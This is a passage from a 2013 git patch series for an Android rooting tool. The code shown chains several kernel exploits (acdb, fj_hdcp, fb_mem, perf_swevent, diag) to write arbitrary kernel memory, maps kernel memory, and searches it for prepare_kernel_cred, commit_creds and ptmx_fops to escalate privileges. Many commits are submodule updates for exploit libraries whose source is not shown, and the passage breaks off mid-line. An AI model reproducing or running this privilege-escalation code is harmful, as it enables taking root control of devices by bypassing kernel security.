(kernel_physical_offset) { - fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); - } - - if (fb_mem_write_value_at_address(address, write_value)) { - run_callback(info); - - fb_mem_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -bool -attempt_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - exploit_callback_t callback_func, - void *callback_param) -{ - callback_info_t info; - - info.func = callback_func; - info.param = callback_param; - info.result = false; - - // Attempt exploits in most stable order - - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt fj_hdcp exploit...\n"); - if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt fb_mem exploit...\n"); - if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt perf_swevent exploit...\n"); - if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) { - return info.result; - } - printf("\n"); - - if (attempt_diag_exploit(address, write_value, &info)) { - return info.result; - } - - return false; -} - -bool -attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param) -{ - unsigned long int kernel_physical_offset; - int fd; - void *address; - bool result; - - kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); - if (kernel_physical_offset) { - fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); - } - - printf("Attempt fb_mem exploit...\n"); - address = fb_mem_mmap(&fd); - if (address == MAP_FAILED) { - return false; - } - - result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), - KERNEL_SIZE, - callback_param); - - fb_mem_munmap(address, fd); - - return result; -} diff --git a/exploit.h b/exploit.h deleted file mode 100644 index e6aa746..0000000 --- a/exploit.h +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Copyright (C) 2013 fi01 - * - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - * - */ -#ifndef __EXPLOIT_H__ -#define __EXPLOIT_H__ - -#include - -typedef bool (*exploit_callback_t)(void *param); -typedef bool (*exploit_mmap_callback_t)(void *mem, size_t length, void *param); - -extern bool attempt_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - exploit_callback_t callback_func, - void *callback_param); - -extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, - void *callback_param); - -#endif /* __EXPLOIT_H__ */ -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ diff --git a/libexploit b/libexploit new file mode 160000 index 0000000..2c13202 --- /dev/null +++ b/libexploit @@ -0,0 +1 @@ +Subproject commit 2c132029ebc7d9afa6435b1cf858ccff16ea427c diff --git a/main.c b/main.c index 5701afe..5aba2a0 100644 --- a/main.c +++ b/main.c @@ -14,7 +14,7 @@ #include "cred.h" #include "mm.h" #include "ptmx.h" -#include "exploit.h" +#include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" void diff --git a/mm.c b/mm.c index e1e2b1d..0260a3a 100644 --- a/mm.c +++ b/mm.c @@ -3,13 +3,15 @@ #include #include -#include "exploit.h" #include "kallsyms.h" #include "mm.h" #include "ptmx.h" -#include "libdiagexploit/diag.h" +#include "libexploit/exploit.h" #include "device_database/device_database.h" +#define PAGE_OFFSET 0xc0000000 +#define KERNEL_SIZE 0x02000000 + static unsigned long int kernel_phys_offset; diff --git a/mm.h b/mm.h index edbb1a7..2a0ae67 100644 --- a/mm.h +++ b/mm.h @@ -20,9 +20,7 @@ #include #include - -#define PAGE_OFFSET 0xc0000000 -#define KERNEL_SIZE 0x10000000 +#include struct file; From 7ebc7ca9404383a53bd6531710441ee32d0a5f3a Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 28 Aug 2013 11:57:30 +0900 Subject: [PATCH 075/125] Do not call function kallsyms_in_memory_free() to avoid crash with fb_mem exploit --- main.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/main.c b/main.c index 5aba2a0..2ce0a2b 100644 --- a/main.c +++ b/main.c @@ -110,7 +110,8 @@ bool find_variables_in_memory(void *mem, size_t length) } } - kallsyms_in_memory_free(info); + //FIXME: do not free to avoid crash with fb_mem exploit + //kallsyms_in_memory_free(info); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; From a9a7d52137cedd641c36901d9273cfda4c64df38 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Wed, 11 Sep 2013 22:51:54 +0530 Subject: [PATCH 076/125] update subprojects --- device_database | 2 +- libdiagexploit | 2 +- libmsm_acdb_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 27e25ff..786620e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 27e25ff074200baca24170482888df14d6e9292b +Subproject commit 786620e68aae4dece057478ea52ed1c67e900db8 diff --git a/libdiagexploit b/libdiagexploit index 4dd7f1b..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 6ec9088..56e59f2 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 6ec9088d0bdef05cf1ab7ad8c9546914631cb92f +Subproject commit 56e59f2c7cc1ed8d195c1b339c9d05a8cf39531a From 194ab4969d95638b4bde5ddd77c758b8555353bb Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Thu, 12 Sep 2013 05:05:24 +0530 Subject: [PATCH 077/125] update subprojects --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 786620e..f2f6b28 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 786620e68aae4dece057478ea52ed1c67e900db8 +Subproject commit f2f6b28deb57afd4ec9c650f0e8c1e2f3faf26cd diff --git a/libperf_event_exploit b/libperf_event_exploit index 57b6ff9..4d90962 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 57b6ff9021840fb360469c70d205e4246a420c48 +Subproject commit 4d90962c7a24dcfff7b1977f5eff1420b343f65e From b8daabc21f091c13389e6fae490fca94e72fc4fb Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 23 Sep 2013 23:28:23 +0900 Subject: [PATCH 078/125] update subprojects --- device_database | 2 +- libdiagexploit | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/device_database b/device_database index f2f6b28..765d935 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit f2f6b28deb57afd4ec9c650f0e8c1e2f3faf26cd +Subproject commit 765d935473fcfba4391a4a926c47f32f26ea16b3 diff --git a/libdiagexploit b/libdiagexploit index 83a2e0c..4dd7f1b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e +Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 56e59f2..09ca61d 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 56e59f2c7cc1ed8d195c1b339c9d05a8cf39531a +Subproject commit 09ca61dfd4c40910d70e7fd34f63be282aacda0e diff --git a/libperf_event_exploit b/libperf_event_exploit index 4d90962..87beb66 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4d90962c7a24dcfff7b1977f5eff1420b343f65e +Subproject commit 87beb6660aa2e7ef1b87df3c3643078f0d4bc209 From dec63129a613124a1800749083f3b89936025f8a Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 3 Oct 2013 17:53:38 +0900 Subject: [PATCH 079/125] Add libmsm_cameraconfig_exploit --- .gitmodules | 3 +++ Android.mk | 1 + libexploit | 2 +- libmsm_cameraconfig_exploit | 1 + 4 files changed, 6 insertions(+), 1 deletion(-) create mode 160000 libmsm_cameraconfig_exploit diff --git a/.gitmodules b/.gitmodules index fea3c72..11e896e 100644 --- a/.gitmodules +++ b/.gitmodules @@ -22,3 +22,6 @@ [submodule "libexploit"] path = libexploit url = https://github.com/android-rooting-tools/libexploit.git +[submodule "libmsm_cameraconfig_exploit"] + path = libmsm_cameraconfig_exploit + url = git://github.com/fi01/libmsm_cameraconfig_exploit.git diff --git a/Android.mk b/Android.mk index 34396cd..e836ad9 100644 --- a/Android.mk +++ b/Android.mk @@ -18,6 +18,7 @@ LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libfb_mem_exploit +LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/libexploit b/libexploit index 2c13202..ea44d29 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 2c132029ebc7d9afa6435b1cf858ccff16ea427c +Subproject commit ea44d29d5448e9ec89bedfd44af9a769c290eb26 diff --git a/libmsm_cameraconfig_exploit b/libmsm_cameraconfig_exploit new file mode 160000 index 0000000..5dd3072 --- /dev/null +++ b/libmsm_cameraconfig_exploit @@ -0,0 +1 @@ +Subproject commit 5dd3072fe63c8612aa2a63d48f40a450acb9c810 From 6fb97bdc82e987c67f33ef9976eefdef2142d493 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 3 Oct 2013 17:59:30 +0900 Subject: [PATCH 080/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 765d935..26d329e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 765d935473fcfba4391a4a926c47f32f26ea16b3 +Subproject commit 26d329e77c1a7ffaa680f6713943fb7d66693024 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 09ca61d..7dddf0f 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 09ca61dfd4c40910d70e7fd34f63be282aacda0e +Subproject commit 7dddf0fe69deb074c113c9560a2d7384711ab814 From 9e4c175976bcdda0e4b4a7c483bb92c8eea42cf0 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 13 Oct 2013 11:59:38 +0900 Subject: [PATCH 081/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 26d329e..e2ca26a 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 26d329e77c1a7ffaa680f6713943fb7d66693024 +Subproject commit e2ca26aea1a7ef1791184dcc5d8fcd50c4e23698 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 7dddf0f..dd1b72d 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 7dddf0fe69deb074c113c9560a2d7384711ab814 +Subproject commit dd1b72d2b47ff9f2e2cea4f8d26a593537270741 diff --git a/libperf_event_exploit b/libperf_event_exploit index 87beb66..2506475 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 87beb6660aa2e7ef1b87df3c3643078f0d4bc209 +Subproject commit 2506475033253a268feaa0b049332c11e943201d From c72c316ad392273ee5074b707972ce3683288b24 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 15 Oct 2013 01:51:37 +0900 Subject: [PATCH 082/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index e2ca26a..e54ae07 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e2ca26aea1a7ef1791184dcc5d8fcd50c4e23698 +Subproject commit e54ae07ebe6e07696d8cf07fec437dfcd6ead0f1 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index dd1b72d..739eca0 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit dd1b72d2b47ff9f2e2cea4f8d26a593537270741 +Subproject commit 739eca0886cc8c990cb383ee3cb73786a07e3cc4 From 361b02e8a807ec78733a97d1d2eb12479c484c19 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 5 Nov 2013 22:02:41 +0900 Subject: [PATCH 083/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index e54ae07..6ca2f08 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e54ae07ebe6e07696d8cf07fec437dfcd6ead0f1 +Subproject commit 6ca2f08e204387b4c508caedc3542ce82f4ce147 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 739eca0..0164e69 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 739eca0886cc8c990cb383ee3cb73786a07e3cc4 +Subproject commit 0164e6977df2fcd63161a656eda522ad6045ce41 From 72857d9793022e7a0738189c3298721265d662ab Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 7 Nov 2013 10:19:29 +0900 Subject: [PATCH 084/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 6ca2f08..ba183d9 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 6ca2f08e204387b4c508caedc3542ce82f4ce147 +Subproject commit ba183d9f860507499b8e39af4ca58ce6432301c9 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 0164e69..38b3f0f 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 0164e6977df2fcd63161a656eda522ad6045ce41 +Subproject commit 38b3f0fe48717117ecca24884adf30b8c0d74dbd From adacf192e289d15f4db846675bb1c6c2d9cccc24 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 8 Nov 2013 10:44:55 +0900 Subject: [PATCH 085/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index ba183d9..a361d23 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit ba183d9f860507499b8e39af4ca58ce6432301c9 +Subproject commit a361d238f5c2cf03a649a60bd93a866d14a6b707 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 38b3f0f..f63b2cd 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 38b3f0fe48717117ecca24884adf30b8c0d74dbd +Subproject commit f63b2cd6675172308820b6d29e7d9eae140058b5 From 66babec549367ed0e1e7f9f76d82abcf5295b093 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 13 Nov 2013 13:39:47 +0900 Subject: [PATCH 086/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index a361d23..67e4c80 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a361d238f5c2cf03a649a60bd93a866d14a6b707 +Subproject commit 67e4c803591f3aee9ed0d2a74a79043bd3d416d0 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index f63b2cd..ade80ca 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit f63b2cd6675172308820b6d29e7d9eae140058b5 +Subproject commit ade80cae74e959f2750c44690e6c20a6586975d2 diff --git a/libperf_event_exploit b/libperf_event_exploit index 2506475..db58c5d 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 2506475033253a268feaa0b049332c11e943201d +Subproject commit db58c5d5767f007e3420c2232652506de787f6f0 From 98f800c2bd75e98b17c1030c5c7270c872be7fd1 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 14 Nov 2013 10:53:49 +0900 Subject: [PATCH 087/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 67e4c80..57fb8ac 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 67e4c803591f3aee9ed0d2a74a79043bd3d416d0 +Subproject commit 57fb8ac73edc1cce51bbc48f56dd193002187f1f diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index ade80ca..4ea9f84 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit ade80cae74e959f2750c44690e6c20a6586975d2 +Subproject commit 4ea9f847e2ffd8077d493c45e6a4973b4929688f From f20030a5050135b89ae9704cb3114cf84cca10a5 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 18 Nov 2013 12:50:12 +0900 Subject: [PATCH 088/125] Add libput_user_exploit --- .gitmodules | 3 +++ Android.mk | 1 + libexploit | 2 +- libput_user_exploit | 1 + 4 files changed, 6 insertions(+), 1 deletion(-) create mode 160000 libput_user_exploit diff --git a/.gitmodules b/.gitmodules index 11e896e..35545bc 100644 --- a/.gitmodules +++ b/.gitmodules @@ -25,3 +25,6 @@ [submodule "libmsm_cameraconfig_exploit"] path = libmsm_cameraconfig_exploit url = git://github.com/fi01/libmsm_cameraconfig_exploit.git +[submodule "libput_user_exploit"] + path = libput_user_exploit + url = https://github.com/fi01/libput_user_exploit.git diff --git a/Android.mk b/Android.mk index e836ad9..0ff6128 100644 --- a/Android.mk +++ b/Android.mk @@ -19,6 +19,7 @@ LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libfb_mem_exploit LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit +LOCAL_STATIC_LIBRARIES += libput_user_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/libexploit b/libexploit index ea44d29..d5085f5 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit ea44d29d5448e9ec89bedfd44af9a769c290eb26 +Subproject commit d5085f51be4dede39230015a3e71b1d8da83c579 diff --git a/libput_user_exploit b/libput_user_exploit new file mode 160000 index 0000000..86c2272 --- /dev/null +++ b/libput_user_exploit @@ -0,0 +1 @@ +Subproject commit 86c22721e89a5c72261851786405e2223950ee58 From c5f5051cb64d8ab2a342877ee5d0b4a75a71cbe5 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 18 Nov 2013 18:13:19 +0900 Subject: [PATCH 089/125] update subprojects --- device_database | 2 +- libput_user_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 57fb8ac..6b227ff 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 57fb8ac73edc1cce51bbc48f56dd193002187f1f +Subproject commit 6b227ffb7082cf2119883302c5dc62389478244d diff --git a/libput_user_exploit b/libput_user_exploit index 86c2272..d437838 160000 --- a/libput_user_exploit +++ b/libput_user_exploit @@ -1 +1 @@ -Subproject commit 86c22721e89a5c72261851786405e2223950ee58 +Subproject commit d43783871e38a3d26fa8c4ecd50c9453f8fa5a78 From 7a47b1d2eb4275f17337fef09a743a3e2c90d0d2 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 19 Oct 2013 12:34:59 +0900 Subject: [PATCH 090/125] update subprojects --- libkallsyms | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libkallsyms b/libkallsyms index cb04750..86f2c67 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit cb047501155601e7699e4653ba2067d6cf1087b4 +Subproject commit 86f2c67b0be6718fd4b5a510180666e7d49f2cf7 From c9c69d10771b8d408751ebd436ab13fc9abae482 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 19 Nov 2013 18:37:36 +0900 Subject: [PATCH 091/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 6b227ff..f92ea92 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 6b227ffb7082cf2119883302c5dc62389478244d +Subproject commit f92ea92e0b3e34f0f0ed5ba5f9fc348ad5d81516 From c1109f45b9ff2e3f66a227b8ebc8fb38a83cc85a Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 23 Nov 2013 21:30:57 +0900 Subject: [PATCH 092/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index f92ea92..e1c4e1f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit f92ea92e0b3e34f0f0ed5ba5f9fc348ad5d81516 +Subproject commit e1c4e1f8fe8fc3a1f5d2299cfae818c759ab211d From 9aaa917db4ef96a2632bfccc4f46346e8ad44b21 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 28 Nov 2013 17:52:18 +0900 Subject: [PATCH 093/125] Add libget_user_exploit --- .gitmodules | 3 +++ Android.mk | 1 + device_database | 2 +- libexploit | 2 +- libget_user_exploit | 1 + main.c | 5 ++++- mm.c | 47 +++++++++++++++++++++++++++++++++++---------- mm.h | 5 +++-- 8 files changed, 51 insertions(+), 15 deletions(-) create mode 160000 libget_user_exploit diff --git a/.gitmodules b/.gitmodules index 35545bc..f457376 100644 --- a/.gitmodules +++ b/.gitmodules @@ -28,3 +28,6 @@ [submodule "libput_user_exploit"] path = libput_user_exploit url = https://github.com/fi01/libput_user_exploit.git +[submodule "libget_user_exploit"] + path = libget_user_exploit + url = https://github.com/fi01/libget_user_exploit.git diff --git a/Android.mk b/Android.mk index 0ff6128..cbfdb80 100644 --- a/Android.mk +++ b/Android.mk @@ -20,6 +20,7 @@ LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libfb_mem_exploit LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit LOCAL_STATIC_LIBRARIES += libput_user_exploit +LOCAL_STATIC_LIBRARIES += libget_user_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/device_database b/device_database index e1c4e1f..c7457c1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e1c4e1f8fe8fc3a1f5d2299cfae818c759ab211d +Subproject commit c7457c1af43b2fdd80e50e02a2e0488185cd4f52 diff --git a/libexploit b/libexploit index d5085f5..76252ed 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit d5085f51be4dede39230015a3e71b1d8da83c579 +Subproject commit 76252ed65f67a87402628d2d12f38f30550d2287 diff --git a/libget_user_exploit b/libget_user_exploit new file mode 160000 index 0000000..bedea14 --- /dev/null +++ b/libget_user_exploit @@ -0,0 +1 @@ +Subproject commit bedea14b5148931bf8bc98f8dfbac55f707a73ea diff --git a/main.c b/main.c index 2ce0a2b..1a02edb 100644 --- a/main.c +++ b/main.c @@ -136,7 +136,10 @@ setup_variables(void) } printf("Try to find address in memory...\n"); - run_with_mmap(find_variables_in_memory); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } if (prepare_kernel_cred && commit_creds && ptmx_fops) { printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); diff --git a/mm.c b/mm.c index 0260a3a..03d9e94 100644 --- a/mm.c +++ b/mm.c @@ -101,7 +101,7 @@ run_callback_with_mmap(void *user_data) int fd; void *address; void *start_address = (void *)0x20000000; - mmap_callback_t callback = (mmap_callback_t)user_data; + memory_callback_t callback = (memory_callback_t)user_data; bool ret; fd = open(PTMX_DEVICE, O_RDWR); @@ -123,15 +123,15 @@ run_callback_with_mmap(void *user_data) return ret; } -typedef struct _callback_mmap_exploit_info_t { - mmap_callback_t func; +typedef struct _callback_memory_exploit_info_t { + memory_callback_t func; bool result; -} callback_mmap_exploit_info_t; +} callback_memory_exploit_info_t; static bool -run_callback_mmap_exploit(void *address, size_t length, void *param) +run_callback_memory_exploit(void *address, size_t length, void *param) { - callback_mmap_exploit_info_t *info = param; + callback_memory_exploit_info_t *info = param; info->result = info->func(address, length); @@ -139,13 +139,13 @@ run_callback_mmap_exploit(void *address, size_t length, void *param) } static bool -run_exploit_mmap(mmap_callback_t callback, bool *result) +run_exploit_mmap(memory_callback_t callback, bool *result) { - callback_mmap_exploit_info_t info; + callback_memory_exploit_info_t info; info.func = callback; - if (attempt_mmap_exploit(&run_callback_mmap_exploit, &info)) { + if (attempt_mmap_exploit(&run_callback_memory_exploit, &info)) { *result = info.result; return true; } @@ -154,7 +154,7 @@ run_exploit_mmap(mmap_callback_t callback, bool *result) } bool -run_with_mmap(mmap_callback_t callback) +run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; @@ -189,3 +189,30 @@ run_with_mmap(mmap_callback_t callback) (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); } + +static bool +run_exploit_memcpy(memory_callback_t callback, bool *result) +{ + callback_memory_exploit_info_t info; + + info.func = callback; + + if (attempt_memcpy_exploit(&run_callback_memory_exploit, &info)) { + *result = info.result; + return true; + } + + return false; +} + +bool +run_with_memcpy(memory_callback_t callback) +{ + bool result; + + if (run_exploit_memcpy(callback, &result)) { + return result; + } + + return false; +} diff --git a/mm.h b/mm.h index 2a0ae67..53aaf04 100644 --- a/mm.h +++ b/mm.h @@ -36,10 +36,11 @@ struct vm_area_struct { /* ... */ }; -typedef bool (*mmap_callback_t)(void *mem, size_t length); +typedef bool (*memory_callback_t)(void *mem, size_t length); extern bool setup_remap_pfn_range_address(void); -extern bool run_with_mmap(mmap_callback_t callback); +extern bool run_with_mmap(memory_callback_t callback); +extern bool run_with_memcpy(memory_callback_t callback); extern void set_kernel_phys_offset(unsigned long int offset); extern void *convert_to_kernel_address(void *address, void *mmap_base_address); From ddf15a54e235250004f2223d8a2fee22ebfcafba Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 11:24:21 +0900 Subject: [PATCH 094/125] update subprojects --- device_database | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index c7457c1..cf3853a 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit c7457c1af43b2fdd80e50e02a2e0488185cd4f52 +Subproject commit cf3853a407efbbb8222f0b21e7a24729a274010f diff --git a/libkallsyms b/libkallsyms index 86f2c67..49f2ec7 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 86f2c67b0be6718fd4b5a510180666e7d49f2cf7 +Subproject commit 49f2ec7bce717e1b64f5d22270cbdb452236648e From 3f4397af30f963d53176856463c959257a43e0db Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 9 Dec 2013 21:07:49 +0900 Subject: [PATCH 095/125] Enable kallsyms_in_memory_free() that it crashes no longer --- main.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/main.c b/main.c index 1a02edb..d6554ba 100644 --- a/main.c +++ b/main.c @@ -110,8 +110,7 @@ bool find_variables_in_memory(void *mem, size_t length) } } - //FIXME: do not free to avoid crash with fb_mem exploit - //kallsyms_in_memory_free(info); + kallsyms_in_memory_free(info); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; From d6dee78e3ac3ca1329ff90a77f366289b0d9b30b Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 9 Dec 2013 21:38:31 +0900 Subject: [PATCH 096/125] Fix searching ptmx_fops address, now it ignores file operations what will be NULL. --- ptmx.c | 29 ++++++++++++++++++----------- 1 file changed, 18 insertions(+), 11 deletions(-) diff --git a/ptmx.c b/ptmx.c index fccafd9..8f5bc68 100644 --- a/ptmx.c +++ b/ptmx.c @@ -55,19 +55,26 @@ setup_ptmx_fops_fsync_address(void) bool setup_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) { - unsigned long int pattern[16]; - void *address; + int i; - memset(pattern, 0, sizeof pattern); - pattern[2] = hint->ptmx_open_address; - pattern[4] = hint->tty_release_address; - pattern[7] = hint->tty_fasync_address; + for (i = 0x24; i < length - 0x40; i += 4) { + unsigned long int *address = mem + i; - address = memmem(mem, length, pattern, sizeof pattern); - if (!address) { - return false; + if (address[2] != hint->ptmx_open_address) { + continue; + } + + if (address[4] != hint->tty_release_address) { + continue; + } + + if (address[7] 